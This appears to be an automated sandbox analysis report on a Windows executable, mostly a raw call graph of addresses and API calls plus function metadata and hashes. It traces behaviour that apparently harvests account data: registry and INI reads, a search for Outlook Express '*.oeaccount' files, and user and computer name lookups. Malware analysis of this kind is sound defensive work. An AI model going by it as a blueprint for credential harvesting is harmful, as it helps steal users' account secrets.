33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33626 4070ae 33585->33626 33587 410e1d 33586->33587 33629 410a9c RegOpenKeyExA 33587->33629 33591 410dee SHGetSpecialFolderPathA 33592 401e9e strlen strlen 33591->33592 33592->33454 33592->33455 33593 410e4a 33594 410e7f _mbscpy 33593->33594 33630 410d3d _mbscpy 33593->33630 33594->33592 33596 410e5b 33631 410add RegQueryValueExA 33596->33631 33598 410e73 RegCloseKey 33598->33594 33599->33458 33600->33464 33632 410a9c RegOpenKeyExA 33601->33632 33603 401c4c 33604 401cad 33603->33604 33633 410add RegQueryValueExA 33603->33633 33604->33467 33604->33468 33606 401c6a 33607 401c71 strchr 33606->33607 33608 401ca4 RegCloseKey 33606->33608 33607->33608 33609 401c85 strchr 33607->33609 33608->33604 33609->33608 33610 401c94 33609->33610 33634 406f06 strlen 33610->33634 33612 401ca1 33612->33608 33613->33470 33614->33455 33615->33461 33616->33487 33637 410a9c RegOpenKeyExA 33617->33637 33619 410b34 33620 410b5d 33619->33620 33638 410add RegQueryValueExA 33619->33638 33620->33487 33622 410b4c RegCloseKey 33622->33620 33624->33487 33625->33475 33627 4070bd GetVersionExA 33626->33627 33628 4070ce 33626->33628 33627->33628 33628->33586 33628->33591 33629->33593 33630->33596 33631->33598 33632->33603 33633->33606 33635 406f17 33634->33635 33636 406f1a memcpy 33634->33636 33635->33636 33636->33612 33637->33619 33638->33622 33640 409b40 33639->33640 33642 409b4e 33639->33642 33647 409901 memset SendMessageA 33640->33647 33643 409b99 33642->33643 33644 409b8b 33642->33644 33643->33499 33648 409868 SendMessageA 33644->33648 33646->33495 33647->33642 33648->33643 33649->33502 33650->33504 33652 410807 33651->33652 33653 4107fc FreeLibrary 33651->33653 33652->33504 33653->33652 33655 410816 33654->33655 33656 4107f1 FreeLibrary 33655->33656 33657 410825 33656->33657 33657->33504 33659 404785 FreeLibrary 33658->33659 33660 40473b LoadLibraryA 33659->33660 33661 40474c GetProcAddress 33660->33661 33664 40476e 33660->33664 33662 404764 33661->33662 33661->33664 33662->33664 33663 404781 33663->33504 33664->33663 33665 404785 FreeLibrary 33664->33665 33665->33663 33667 4047a3 33666->33667 33668 404799 FreeLibrary 33666->33668 33667->33504 33668->33667 33670 4107f1 FreeLibrary 33669->33670 33671 403c30 LoadLibraryA 33670->33671 33672 403c5e 33671->33672 33673 403c44 GetProcAddress 33671->33673 33674 4107f1 FreeLibrary 33672->33674 33675 403c6b 33672->33675 33673->33672 33674->33675 33676 404734 3 API calls 33675->33676 33677 403c86 33676->33677 33744 4036e5 33677->33744 33680 4036e5 27 API calls 33681 403c9a 33680->33681 33682 4036e5 27 API calls 33681->33682 33683 403ca4 33682->33683 33684 4036e5 27 API calls 33683->33684 33685 403cae 33684->33685 33756 4085d2 33685->33756 33693 403ce5 33694 403cf7 33693->33694 33942 402bd1 40 API calls 33693->33942 33802 410a9c RegOpenKeyExA 33694->33802 33697 403d0a 33698 403d1c 33697->33698 33943 402bd1 40 API calls 33697->33943 33803 402c5d 33698->33803 33702 4070ae GetVersionExA 33703 403d31 33702->33703 33821 410a9c RegOpenKeyExA 33703->33821 33705 403d51 33706 403d61 33705->33706 33822 402b22 memset 33705->33822 33831 410a9c RegOpenKeyExA 33706->33831 33709 403d87 33710 403d97 33709->33710 33711 402b22 47 API calls 33709->33711 33832 410a9c RegOpenKeyExA 33710->33832 33711->33710 33713 403dbd 33714 403dcd 33713->33714 33715 402b22 47 API calls 33713->33715 33716 410808 FreeLibrary 33714->33716 33715->33714 33717 403ddd 33716->33717 33718 404785 FreeLibrary 33717->33718 33719 403de8 33718->33719 33833 402fdb 33719->33833 33722 402fdb 34 API calls 33723 403e00 33722->33723 33849 4032b7 33723->33849 33732 403e3b 33734 403e73 33732->33734 33735 403e46 _mbscpy 33732->33735 33896 40fb00 33734->33896 33945 40f334 334 API calls 33735->33945 33743->33506 33745 4037c5 33744->33745 33746 4036fb 33744->33746 33745->33680 33946 410863 UuidFromStringA UuidFromStringA 33746->33946 33749 403716 strchr 33749->33745 33750 403730 33749->33750 33950 4021b6 memset 33750->33950 33752 40373f _mbscpy _mbscpy strlen 33753 4037a4 _mbscpy 33752->33753 33754 403789 sprintf 33752->33754 33951 4023e5 16 API calls 33753->33951 33754->33753 33757 4085e2 33756->33757 33952 4082cd 11 API calls 33757->33952 33761 408600 33762 403cba 33761->33762 33763 40860b memset 33761->33763 33774 40821d 33762->33774 33955 410b62 RegEnumKeyExA 33763->33955 33765 4086d2 RegCloseKey 33765->33762 33767 408637 33767->33765 33768 40865c memset 33767->33768 33956 410a9c RegOpenKeyExA 33767->33956 33959 410b62 RegEnumKeyExA 33767->33959 33957 410add RegQueryValueExA 33768->33957 33771 408694 33958 40848b 10 API calls 33771->33958 33773 4086ab RegCloseKey 33773->33767 33960 410a9c RegOpenKeyExA 33774->33960 33776 40823f 33777 403cc6 33776->33777 33778 408246 memset 33776->33778 33786 4086e0 33777->33786 33961 410b62 RegEnumKeyExA 33778->33961 33780 4082bf RegCloseKey 33780->33777 33782 40826f 33782->33780 33962 410a9c RegOpenKeyExA 33782->33962 33963 4080ed 11 API calls 33782->33963 33964 410b62 RegEnumKeyExA 33782->33964 33785 4082a2 RegCloseKey 33785->33782 33965 4045db 33786->33965 33788 4088ef 33973 404656 33788->33973 33792 408737 wcslen 33792->33788 33798 40876a 33792->33798 33793 40877a _wcsncoll 33793->33798 33795 404734 3 API calls 33795->33798 33796 404785 FreeLibrary 33796->33798 33797 408812 memset 33797->33798 33799 40883c memcpy wcschr 33797->33799 33798->33788 33798->33793 33798->33795 33798->33796 33798->33797 33798->33799 33800 4088c3 LocalFree 33798->33800 33976 40466b _mbscpy 33798->33976 33799->33798 33800->33798 33801 410a9c RegOpenKeyExA 33801->33693 33802->33697 33977 410a9c RegOpenKeyExA 33803->33977 33805 402c7a 33806 402da5 33805->33806 33807 402c87 memset 33805->33807 33806->33702 33978 410b62 RegEnumKeyExA 33807->33978 33809 402d9c RegCloseKey 33809->33806 33810 410b1e 3 API calls 33811 402ce4 memset sprintf 33810->33811 33979 410a9c RegOpenKeyExA 33811->33979 33813 402d28 33814 402d3a sprintf 33813->33814 33982 402bd1 40 API calls 33813->33982 33980 410a9c RegOpenKeyExA 33814->33980 33819 402cb2 33819->33809 33819->33810 33820 402d9a 33819->33820 33981 410b62 RegEnumKeyExA 33819->33981 33983 402bd1 40 API calls 33819->33983 33820->33809 33821->33705 33984 410b62 RegEnumKeyExA 33822->33984 33824 402bbb RegCloseKey 33824->33706 33825 406f06 2 API calls 33827 402b58 33825->33827 33827->33824 33827->33825 33830 402bb8 33827->33830 33985 410a9c RegOpenKeyExA 33827->33985 33986 402a9d memset 33827->33986 33994 410b62 RegEnumKeyExA 33827->33994 33830->33824 33831->33709 33832->33713 34034 410a9c RegOpenKeyExA 33833->34034 33835 402ff9 33836 403006 memset 33835->33836 33837 40312c 33835->33837 34035 410b62 RegEnumKeyExA 33836->34035 33837->33722 33839 403122 RegCloseKey 33839->33837 33840 410b1e 3 API calls 33841 403058 memset sprintf 33840->33841 34036 410a9c RegOpenKeyExA 33841->34036 33843 4030a2 memset 34037 410b62 RegEnumKeyExA 33843->34037 33845 410b62 RegEnumKeyExA 33848 403033 33845->33848 33846 4030f9 RegCloseKey 33846->33848 33848->33839 33848->33840 33848->33843 33848->33845 33848->33846 34038 402db3 26 API calls 33848->34038 33850 4032d5 33849->33850 33851 4033a9 33849->33851 34039 4021b6 memset 33850->34039 33864 4034e4 memset memset 33851->33864 33853 4032e1 34040 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->34040 33855 4032ea 33856 4032f8 memset GetPrivateProfileSectionA 33855->33856 34041 4023e5 16 API calls 33855->34041 33856->33851 33861 40332f 33856->33861 33858 40339b strlen 33858->33851 33858->33861 33860 403350 strchr 33860->33861 33861->33851 33861->33858 34042 4021b6 memset 33861->34042 34043 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33861->34043 34044 4023e5 16 API calls 33861->34044 33865 410b1e 3 API calls 33864->33865 33866 40353f 33865->33866 33867 40357f 33866->33867 33868 403546 _mbscpy 33866->33868 33872 403985 33867->33872 34045 406d55 strlen _mbscat 33868->34045 33870 403565 _mbscat 34046 4033f0 19 API calls 33870->34046 34047 40466b _mbscpy 33872->34047 33876 4039aa 33878 4039ff 33876->33878 34048 40f460 memset memset 33876->34048 34069 40f6e2 33876->34069 34085 4038e8 21 API calls 33876->34085 33879 404785 FreeLibrary 33878->33879 33880 403a0b 33879->33880 33881 4037ca memset memset 33880->33881 34093 444551 memset 33881->34093 33883 4038e2 33883->33732 33944 40f334 334 API calls 33883->33944 33886 40382e 33887 406f06 2 API calls 33886->33887 33888 403843 33887->33888 33889 406f06 2 API calls 33888->33889 33890 403855 strchr 33889->33890 33891 403884 _mbscpy 33890->33891 33892 403897 strlen 33890->33892 33893 4038bf _mbscpy 33891->33893 33892->33893 33894 4038a4 sprintf 33892->33894 34105 4023e5 16 API calls 33893->34105 33894->33893 33897 44b090 33896->33897 33898 40fb10 RegOpenKeyExA 33897->33898 33899 403e7f 33898->33899 33900 40fb3b RegOpenKeyExA 33898->33900 33910 40f96c 33899->33910 33901 40fb55 RegQueryValueExA 33900->33901 33902 40fc2d RegCloseKey 33900->33902 33903 40fc23 RegCloseKey 33901->33903 33904 40fb84 33901->33904 33902->33899 33903->33902 33905 404734 3 API calls 33904->33905 33906 40fb91 33905->33906 33906->33903 33907 40fc19 LocalFree 33906->33907 33908 40fbdd memcpy memcpy 33906->33908 33907->33903 34110 40f802 11 API calls 33908->34110 33911 4070ae GetVersionExA 33910->33911 33912 40f98d 33911->33912 33913 4045db 7 API calls 33912->33913 33921 40f9a9 33913->33921 33914 40fae6 33915 404656 FreeLibrary 33914->33915 33916 403e85 33915->33916 33922 4442ea memset 33916->33922 33917 40fa13 memset WideCharToMultiByte 33918 40fa43 _strnicmp 33917->33918 33917->33921 33919 40fa5b WideCharToMultiByte 33918->33919 33918->33921 33920 40fa88 WideCharToMultiByte 33919->33920 33919->33921 33920->33921 33921->33914 33921->33917 33923 410dbb 10 API calls 33922->33923 33924 444329 33923->33924 34111 40759e strlen strlen 33924->34111 33929 410dbb 10 API calls 33930 444350 33929->33930 33931 40759e 3 API calls 33930->33931 33932 44435a 33931->33932 33933 444212 65 API calls 33932->33933 33934 444366 memset memset 33933->33934 33935 410b1e 3 API calls 33934->33935 33936 4443b9 ExpandEnvironmentStringsA strlen 33935->33936 33937 4443f4 _strcmpi 33936->33937 33938 4443e5 33936->33938 33939 403e91 33937->33939 33940 44440c 33937->33940 33938->33937 33939->33504 33941 444212 65 API calls 33940->33941 33941->33939 33942->33694 33943->33698 33944->33732 33945->33734 33947 40370e 33946->33947 33948 41088d 33946->33948 33947->33745 33947->33749 33948->33947 33949 4108be memcpy CoTaskMemFree 33948->33949 33949->33947 33950->33752 33951->33745 33953 40841c 33952->33953 33954 410a9c RegOpenKeyExA 33953->33954 33954->33761 33955->33767 33956->33767 33957->33771 33958->33773 33959->33767 33960->33776 33961->33782 33962->33782 33963->33785 33964->33782 33966 404656 FreeLibrary 33965->33966 33967 4045e3 LoadLibraryA 33966->33967 33968 404651 33967->33968 33969 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33967->33969 33968->33788 33968->33792 33970 40463d 33969->33970 33971 404643 33970->33971 33972 404656 FreeLibrary 33970->33972 33971->33968 33972->33968 33974 403cd2 33973->33974 33975 40465c FreeLibrary 33973->33975 33974->33801 33975->33974 33976->33798 33977->33805 33978->33819 33979->33813 33980->33819 33981->33819 33982->33814 33983->33819 33984->33827 33985->33827 33995 410b62 RegEnumKeyExA 33986->33995 33988 402b15 RegCloseKey 33988->33827 33992 402ad0 33992->33988 33993 402b14 33992->33993 33996 410a9c RegOpenKeyExA 33992->33996 33997 402a14 memset 33992->33997 34005 410b62 RegEnumKeyExA 33992->34005 33993->33988 33994->33827 33995->33992 33996->33992 34006 410b62 RegEnumKeyExA 33997->34006 33999 402a93 RegCloseKey 33999->33992 34001 402a48 34001->33999 34007 410a9c RegOpenKeyExA 34001->34007 34008 4027be 34001->34008 34023 410b62 RegEnumKeyExA 34001->34023 34005->33992 34006->34001 34007->34001 34009 40285a memset 34008->34009 34024 4029a2 RegQueryValueExA 34009->34024 34011 402885 34011->34009 34012 402998 RegCloseKey 34011->34012 34030 4021b6 memset 34011->34030 34012->34001 34014 402898 _mbscpy 34015 4029a2 4 API calls 34014->34015 34019 4028d4 34015->34019 34016 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34016->34019 34017 410ab6 RegQueryValueExA 34017->34019 34019->34016 34019->34017 34031 401989 _mbscpy _mbscat _mbscat 34019->34031 34032 402624 10 API calls 34019->34032 34021 40296d _mbscpy 34033 4023e5 16 API calls 34021->34033 34023->34001 34025 4029dd 34024->34025 34029 4029f2 34024->34029 34026 4029f7 WideCharToMultiByte 34025->34026 34027 4029e9 34025->34027 34026->34029 34028 406f06 2 API calls 34027->34028 34028->34029 34029->34011 34030->34014 34031->34019 34032->34021 34033->34011 34034->33835 34035->33848 34036->33848 34037->33848 34038->33848 34039->33853 34040->33855 34041->33856 34042->33860 34043->33861 34044->33861 34045->33870 34046->33867 34047->33876 34086 4078ba 34048->34086 34051 4078ba _mbsnbcat 34052 40f5a3 RegOpenKeyExA 34051->34052 34053 40f5c3 RegQueryValueExA 34052->34053 34054 40f6d9 34052->34054 34055 40f6d0 RegCloseKey 34053->34055 34056 40f5f0 34053->34056 34054->33876 34055->34054 34056->34055 34057 40f675 34056->34057 34090 40466b _mbscpy 34056->34090 34057->34055 34091 4012ee strlen 34057->34091 34059 40f611 34061 404734 3 API calls 34059->34061 34066 40f616 34061->34066 34062 40f69e RegQueryValueExA 34062->34055 34063 40f6c1 34062->34063 34063->34055 34064 40f66a 34065 404785 FreeLibrary 34064->34065 34065->34057 34066->34064 34067 40f661 LocalFree 34066->34067 34068 40f645 memcpy 34066->34068 34067->34064 34068->34067 34092 40466b _mbscpy 34069->34092 34071 40f6fa 34072 4045db 7 API calls 34071->34072 34073 40f708 34072->34073 34074 404734 3 API calls 34073->34074 34079 40f7e2 34073->34079 34080 40f715 34074->34080 34075 404656 FreeLibrary 34076 40f7f1 34075->34076 34077 404785 FreeLibrary 34076->34077 34078 40f7fc 34077->34078 34078->33876 34079->34075 34080->34079 34081 40f797 WideCharToMultiByte 34080->34081 34082 40f7b8 strlen 34081->34082 34083 40f7d9 LocalFree 34081->34083 34082->34083 34084 40f7c8 _mbscpy 34082->34084 34083->34079 34084->34083 34085->33876 34087 4078e6 34086->34087 34088 4078c7 _mbsnbcat 34087->34088 34089 4078ea 34087->34089 34088->34087 34089->34051 34090->34059 34091->34062 34092->34071 34106 410a9c RegOpenKeyExA 34093->34106 34095 40381a 34095->33883 34104 4021b6 memset 34095->34104 34096 44458b 34096->34095 34107 410add RegQueryValueExA 34096->34107 34098 4445a4 34099 4445dc RegCloseKey 34098->34099 34108 410add RegQueryValueExA 34098->34108 34099->34095 34101 4445c1 34101->34099 34109 444879 30 API calls 34101->34109 34103 4445da 34103->34099 34104->33886 34105->33883 34106->34096 34107->34098 34108->34101 34109->34103 34110->33907 34112 4075c9 34111->34112 34113 4075bb _mbscat 34111->34113 34114 444212 34112->34114 34113->34112 34130 407e9d 34114->34130 34117 44424d 34118 444274 34117->34118 34138 444196 34117->34138 34149 407ef8 34117->34149 34119 407e9d 9 API calls 34118->34119 34126 4442a0 34119->34126 34121 407ef8 9 API calls 34121->34126 34122 4442ce 34163 407f90 34122->34163 34126->34121 34126->34122 34128 444212 65 API calls 34126->34128 34159 407e62 34126->34159 34127 407f90 FindClose 34129 4442e4 34127->34129 34128->34126 34129->33929 34131 407f90 FindClose 34130->34131 34132 407eaa 34131->34132 34133 406f06 2 API calls 34132->34133 34134 407ebd strlen strlen 34133->34134 34135 407ee1 34134->34135 34136 407eea 34134->34136 34166 4070e3 strlen _mbscat _mbscpy _mbscat 34135->34166 34136->34117 34167 406d01 CreateFileA 34138->34167 34140 4441a1 34141 44420e 34140->34141 34142 4441aa GetFileSize 34140->34142 34141->34117 34143 444203 CloseHandle 34142->34143 34144 4441bd ??2@YAPAXI SetFilePointer 34142->34144 34143->34141 34168 407560 ReadFile 34144->34168 34146 4441e4 34169 444059 34146->34169 34150 407f03 FindFirstFileA 34149->34150 34151 407f24 FindNextFileA 34149->34151 34152 407f3f 34150->34152 34153 407f46 strlen strlen 34151->34153 34154 407f3a 34151->34154 34152->34153 34157 407f7f 34152->34157 34155 407f76 34153->34155 34153->34157 34156 407f90 FindClose 34154->34156 34200 4070e3 strlen _mbscat _mbscpy _mbscat 34155->34200 34156->34152 34157->34117 34160 407e94 34159->34160 34161 407e6c strcmp 34159->34161 34160->34126 34161->34160 34162 407e83 strcmp 34161->34162 34162->34160 34164 407fa3 34163->34164 34165 407f99 FindClose 34163->34165 34164->34127 34165->34164 34166->34136 34167->34140 34168->34146 34170 44b090 34169->34170 34171 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34170->34171 34184 44338b 6 API calls 34171->34184 34173 44409f 34174 4440bf strlen 34173->34174 34185 4434fc ??3@YAXPAX ??2@YAPAXI 34174->34185 34176 4440df memcpy 34186 443607 34176->34186 34178 44413d ??3@YAXPAX 34196 443473 9 API calls 34178->34196 34181 406f06 2 API calls 34181->34178 34183 44418f ??3@YAXPAX 34183->34143 34184->34173 34185->34176 34197 407948 ??3@YAXPAX ??3@YAXPAX 34186->34197 34188 443639 34198 407948 ??3@YAXPAX ??3@YAXPAX 34188->34198 34190 44391c 34190->34178 34190->34181 34191 407a1f 4 API calls 34193 443644 34191->34193 34192 443528 19 API calls 34192->34193 34193->34190 34193->34191 34193->34192 34194 44379d memcpy 34193->34194 34199 442d8e 9 API calls 34193->34199 34194->34193 34196->34183 34197->34188 34198->34193 34199->34193 34200->34157 34201->33519 34202->33523 34203->33530 34204->33529 34205->33536 34206->33533 34207->33528 34209 404785 FreeLibrary 34208->34209 34210 4041b3 34209->34210 34211 410808 FreeLibrary 34210->34211 34212 4041c4 34211->34212 34213 404785 FreeLibrary 34212->34213 34214 4041df 34213->34214 34219 404104 34214->34219 34218 4041eb ??3@YAXPAX 34218->33539 34220 4080d4 ??3@YAXPAX 34219->34220 34221 404111 34220->34221 34222 4080d4 ??3@YAXPAX 34221->34222 34223 40411c 34222->34223 34250 4078ed 34223->34250 34228 404143 34230 407a55 ??3@YAXPAX 34228->34230 34229 404135 SetCurrentDirectoryA 34229->34228 34231 40414b 34230->34231 34232 407a55 ??3@YAXPAX 34231->34232 34233 404153 34232->34233 34234 409a98 34233->34234 34235 409a32 5 API calls 34234->34235 34236 409aa6 34235->34236 34237 409ab9 34236->34237 34238 407a55 ??3@YAXPAX 34236->34238 34240 407a55 ??3@YAXPAX 34237->34240 34241 409acc 34237->34241 34239 409ab2 ??3@YAXPAX 34238->34239 34239->34237 34244 409ac5 ??3@YAXPAX 34240->34244 34242 409adf 34241->34242 34245 407a55 ??3@YAXPAX 34241->34245 34243 409af2 ??3@YAXPAX 34242->34243 34246 407a55 ??3@YAXPAX 34242->34246 34243->34218 34244->34241 34247 409ad8 ??3@YAXPAX 34245->34247 34248 409aeb ??3@YAXPAX 34246->34248 34247->34242 34248->34243 34251 40412a 34250->34251 34252 4078f3 ??3@YAXPAX 34250->34252 34253 404a3a 34251->34253 34252->34251 34254 404a41 34253->34254 34255 40412f 34253->34255 34258 4047cb 11 API calls 34254->34258 34255->34228 34255->34229 34257 404a4c 34257->34255 34258->34257 34267 411853 RtlInitializeCriticalSection memset 34268 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34443 40a256 13 API calls 34445 432e5b 17 API calls 34447 43fa5a 20 API calls 34270 401060 41 API calls 34450 427260 CloseHandle memset memset 34274 410c68 FindResourceA SizeofResource LoadResource LockResource 34452 405e69 14 API calls 34276 433068 15 API calls __fprintf_l 34454 414a6d 18 API calls 34455 43fe6f 134 API calls 34278 424c6d 15 API calls __fprintf_l 34456 426741 19 API calls 34280 440c70 17 API calls 34281 443c71 44 API calls 34284 427c79 24 API calls 34459 416e7e memset __fprintf_l 34288 42800b 47 API calls 34289 425115 85 API calls __fprintf_l 34462 41960c 61 API calls 34290 43f40c 122 API calls __fprintf_l 34293 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34294 43f81a 20 API calls 34296 414c20 memset memset 34297 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34466 414625 18 API calls 34467 404225 modf 34468 403a26 strlen WriteFile 34470 40422a 12 API calls 34474 427632 memset memset memcpy 34475 40ca30 59 API calls 34476 404235 26 API calls 34298 42ec34 61 API calls __fprintf_l 34299 425115 76 API calls __fprintf_l 34477 425115 77 API calls __fprintf_l 34479 44223a 38 API calls 34305 43183c 112 API calls 34480 44b2c5 _onexit __dllonexit 34485 42a6d2 memcpy __allrem 34307 405cda 66 API calls 34493 43fedc 138 API calls 34494 4116e1 16 API calls __fprintf_l 34310 4244e6 19 API calls 34312 42e8e8 127 API calls __fprintf_l 34313 4118ee RtlLeaveCriticalSection 34499 43f6ec 22 API calls 34315 425115 119 API calls __fprintf_l 34316 410cf3 EnumResourceNamesA 34502 4492f0 memcpy memcpy 34504 43fafa 18 API calls 34506 4342f9 15 API calls __fprintf_l 34317 4144fd 19 API calls 34508 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34509 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34512 443a84 _mbscpy 34514 43f681 17 API calls 34320 404487 22 API calls 34516 415e8c 16 API calls __fprintf_l 34324 411893 RtlDeleteCriticalSection __fprintf_l 34325 41a492 42 API calls 34520 403e96 34 API calls 34521 410e98 memset SHGetPathFromIDList SendMessageA 34327 426741 109 API calls __fprintf_l 34328 4344a2 18 API calls 34329 4094a2 10 API calls 34524 4116a6 15 API calls __fprintf_l 34525 43f6a4 17 API calls 34526 440aa3 20 API calls 34528 427430 45 API calls 34332 4090b0 7 API calls 34333 4148b0 15 API calls 34335 4118b4 RtlEnterCriticalSection 34336 4014b7 CreateWindowExA 34337 40c8b8 19 API calls 34339 4118bf RtlTryEnterCriticalSection 34533 42434a 18 API calls __fprintf_l 34535 405f53 12 API calls 34347 43f956 59 API calls 34349 40955a 17 API calls 34350 428561 36 API calls 34351 409164 7 API calls 34539 404366 19 API calls 34543 40176c ExitProcess 34546 410777 42 API calls 34356 40dd7b 51 API calls 34357 425d7c 16 API calls __fprintf_l 34548 43f6f0 25 API calls 34549 42db01 22 API calls 34358 412905 15 API calls __fprintf_l 34550 403b04 54 API calls 34551 405f04 SetDlgItemTextA GetDlgItemTextA 34552 44b301 ??3@YAXPAX 34555 4120ea 14 API calls 3 library calls 34556 40bb0a 8 API calls 34558 413f11 strcmp 34362 434110 17 API calls __fprintf_l 34365 425115 108 API calls __fprintf_l 34559 444b11 _onexit 34367 425115 76 API calls __fprintf_l 34370 429d19 10 API calls 34562 444b1f __dllonexit 34563 409f20 _strcmpi 34372 42b927 31 API calls 34566 433f26 19 API calls __fprintf_l 34567 44b323 FreeLibrary 34568 427f25 46 API calls 34569 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34570 43fb30 19 API calls 34379 414d36 16 API calls 34381 40ad38 7 API calls 34572 433b38 16 API calls __fprintf_l 34573 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34385 426741 21 API calls 34386 40c5c3 125 API calls 34388 43fdc5 17 API calls 34574 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34391 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 33217->33218 34579 43ffc8 18 API calls 34392 4281cc 15 API calls __fprintf_l 34581 4383cc 110 API calls __fprintf_l 34393 4275d3 41 API calls 34582 4153d3 22 API calls __fprintf_l 34394 444dd7 _XcptFilter 34587 4013de 15 API calls 34589 425115 111 API calls __fprintf_l 34590 43f7db 18 API calls 34593 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34396 4335ee 16 API calls __fprintf_l 34595 429fef 11 API calls 34397 444deb _exit _c_exit 34596 40bbf0 139 API calls 34400 425115 79 API calls __fprintf_l 34600 437ffa 22 API calls 34404 4021ff 14 API calls 34405 43f5fc 149 API calls 34601 40e381 9 API calls 34407 405983 40 API calls 34408 42b186 27 API calls __fprintf_l 34409 427d86 76 API calls 34410 403585 20 API calls 34412 42e58e 18 API calls __fprintf_l 34415 425115 75 API calls __fprintf_l 34417 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34605 434395 16 API calls 34419 441d9c memcmp 34607 43f79b 119 API calls 34420 40c599 43 API calls 34608 426741 87 API calls 34424 4401a6 21 API calls 34426 426da6 memcpy memset memset memcpy 34427 4335a5 15 API calls 34429 4299ab memset memset memcpy memset memset 34430 40b1ab 8 API calls 34613 425115 76 API calls __fprintf_l 34617 4113b2 18 API calls 2 library calls 34621 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 33233->33236 33235->33228 33236->33233 34432 40b5bf memset memset _mbsicmp

                          Executed Functions

                          Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                          APIs
                          • memset.MSVCRT ref: 0040832F
                          • memset.MSVCRT ref: 00408343
                          • memset.MSVCRT ref: 0040835F
                          • memset.MSVCRT ref: 00408376
                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                          • strlen.MSVCRT ref: 004083E9
                          • strlen.MSVCRT ref: 004083F8
                          • memcpy.MSVCRT ref: 0040840A
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                          • String ID: 5$H$O$b$i$}$}
                          • API String ID: 1832431107-3760989150
                          • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                          • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                          Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                          • strlen.MSVCRT ref: 00407F5C
                          • strlen.MSVCRT ref: 00407F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFindstrlen$FirstNext
                          • String ID: ACD
                          • API String ID: 379999529-620537770
                          • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
